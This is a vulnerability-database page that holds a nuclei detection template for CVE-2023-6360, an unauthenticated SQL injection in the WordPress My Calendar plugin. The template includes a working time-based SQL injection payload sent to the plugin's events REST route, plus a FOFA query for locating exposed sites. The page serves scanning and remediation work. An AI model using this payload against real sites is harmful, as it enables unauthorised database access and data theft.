Lucene search
K

WordPress My Calendar <3.4.22 - SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 90 Views

WordPress My Calendar <3.4.22 - SQL Injection, unauthenticated, data thef

Related
Refs
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the My Calendar plugin of the WordPress content management system allows a hacker to execute arbitrary SQL queries against the database.
12 Dec 202300:00
bdu_fstec
Circl
CVE-2023-6360
21 Dec 202309:12
circl
CNNVD
WordPress Plugin My Calendar Security Vulnerability
30 Nov 202300:00
cnnvd
CVE
CVE-2023-6360
30 Nov 202315:17
cve
Cvelist
CVE-2023-6360
30 Nov 202315:17
cvelist
NVD
CVE-2023-6360
30 Nov 202316:15
nvd
OSV
CVE-2023-6360
30 Nov 202316:15
osv
Prion
Sql injection
30 Nov 202316:15
prion
Positive Technologies
PT-2023-7555 · WordPress · Wordpress Calendar Plugin
30 Nov 202300:00
ptsecurity
VulnCheck KEV
VulnCheck KEV: CVE-2023-6360
19 Dec 202500:00
vulncheck_kev
Rows per page
id: CVE-2023-6360

info:
  name: WordPress My Calendar <3.4.22 - SQL Injection
  author: xxcdd
  severity: critical
  description: |
    WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, which could lead to data theft, database compromise, or further attack vectors.
  remediation: Upgrade to My Calendar plugin version 3.4.22 or later.
  reference:
    - https://www.tenable.com/security/research/tra-2023-40
    - https://www.joedolson.com/2023/11/my-calendar-3-4-22-security-release/
    - https://wordpress.org/plugins/my-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6360
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6360
    cwe-id: CWE-89
    epss-score: 0.63141
    epss-percentile: 0.99101
    cpe: cpe:2.3:a:joedolson:my_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: joedolson
    product: my_calendar
    framework: wordpress
    fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"'
  tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson,vuln,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'My Calendar'

  - raw:
      - |
        @timeout: 20s
        GET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "application/json")'
          - 'contains(body, "[]")'
          - 'duration >= 6'
        condition: and
# digest: 4a0a00473045022100997aefe0bd2473bebdfd6f84f81f751387c0fef7cfbcc2ecde9746ca0706313e02202ca46a3e9ce7b6de6718e0ef566c07cb619712ad9697472b5ab16e03e131eb25:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.6 - 9.8
EPSS0.63141
SSVC
90